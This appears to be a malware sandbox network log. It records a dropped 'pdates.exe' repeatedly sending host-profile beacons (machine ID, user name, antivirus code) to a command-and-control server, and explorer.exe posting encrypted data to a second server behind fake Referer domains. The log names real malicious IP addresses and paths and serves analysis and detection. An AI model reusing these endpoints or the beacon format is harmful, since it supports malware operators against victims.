Jul 27, 2023 01:36:20.148091078 CEST	5905	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:20.197367907 CEST	5905	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
766	192.168.2.5	50488	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:20.391696930 CEST	5906	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:20.441114902 CEST	5906	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
767	192.168.2.5	50489	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:20.604461908 CEST	5907	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:20.652375937 CEST	5907	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
768	192.168.2.5	50490	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:20.810292959 CEST	5908	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:20.858649969 CEST	5908	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
769	192.168.2.5	50491	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:21.025799990 CEST	5908	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:21.074829102 CEST	5909	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.5	49794	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:23.895977020 CEST	2921	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:23.943553925 CEST	2921	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
770	192.168.2.5	50492	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:21.257064104 CEST	5909	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:21.305363894 CEST	5910	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
771	192.168.2.5	50493	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:21.471601009 CEST	5910	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:21.519720078 CEST	5911	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
772	192.168.2.5	50494	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:21.704749107 CEST	5911	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:21.753135920 CEST	5912	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.5	49795	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:24.115695953 CEST	2922	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:24.164967060 CEST	2922	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.5	49796	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:24.354832888 CEST	2923	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:24.404314041 CEST	2923	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49724	77.91.68.29	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:02.299688101 CEST	1160	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fwflp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: 77.91.68.29
Jul 27, 2023 01:33:02.299745083 CEST	1160	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 29 af a0 d5 f3 c9 39 df 28 fc 9f 23 ee 73 Data Ascii: m}CetW'GPF4Ddw}tYz-bhP)9(#sEl:Ol-]'!3F}qg2L_t&%t8L^($1vjz2P^gSH}
Jul 27, 2023 01:33:02.351711035 CEST	1161	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 403 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>
Jul 27, 2023 01:33:02.402503014 CEST	1161	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gbxxgvql.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: 77.91.68.29
Jul 27, 2023 01:33:02.402575970 CEST	1161	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 28 af a1 d5 f3 c9 38 df 28 fc 9e 58 8a 6b Data Ascii: m}CetW'GPF4Ddw}tYz-bhP(8(Xk0uGEOc~3v5f1uKhdyAS8C'ta?$j#Ek+>9v8W\2[pJ8j)lb;]AD>N82Bh.o3)thes,'B
Jul 27, 2023 01:33:02.451713085 CEST	1162	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 46 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 73 6b 98 d5 45 a9 8d 3b 8d ad 24 17 ed 1a ae 07 26 83 5c 9a e8 Data Ascii: H>99$JYWskE;$&\

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.5	49797	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:24.601993084 CEST	2924	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:24.651132107 CEST	2924	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.5	49798	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:24.815500975 CEST	2925	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:24.864037991 CEST	2925	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.5	49799	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:25.043926001 CEST	2926	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:25.092775106 CEST	2926	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.5	49800	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:25.252545118 CEST	2927	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:25.300736904 CEST	2927	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.5	49801	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:25.463910103 CEST	2927	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:25.512491941 CEST	2928	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.5	49802	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:25.684921980 CEST	2928	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:25.733177900 CEST	2929	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.5	49803	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:25.896753073 CEST	2929	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:25.945580006 CEST	2930	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.5	49804	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:26.111612082 CEST	2930	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:26.161134958 CEST	2931	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.5	49805	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
